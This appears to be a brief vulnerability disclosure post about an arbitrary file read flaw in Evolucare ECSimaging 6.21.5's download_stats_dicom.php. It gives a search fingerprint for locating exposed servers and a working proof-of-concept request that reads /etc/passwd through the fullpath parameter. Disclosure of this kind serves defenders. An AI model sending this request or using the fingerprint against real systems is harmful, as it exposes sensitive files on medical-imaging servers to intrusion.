Evolucare Ecsimaging Download_stats_dicom Php Arbitrary File Reading Vulnerability
Evolucare Ecsimaging Download_stats_dicom Php Arbitrary File Reading Vulnerability
Evolucare Ecsimaging download_stats_dicom.php Arbitrary file reading vulnerability
Vulnerability Description
Evolucare Ecsimaging download_stats_dicom.php There is a file reading vulnerability, which can be used by an attacker to obtain system sensitive information, etc.
Vulnerability Impact
EVOLUCARE Evolucare Ecsimaging 6.21.5
Network surveying and mapping
body=”ECSimaging”
Vulnerability reappears
Login page
Verify POC
1
/download_stats_dicom.php?fullpath=/etc/passwd&filename=/etc/passwd
This post is licensed under CC BY 4.0 by the author.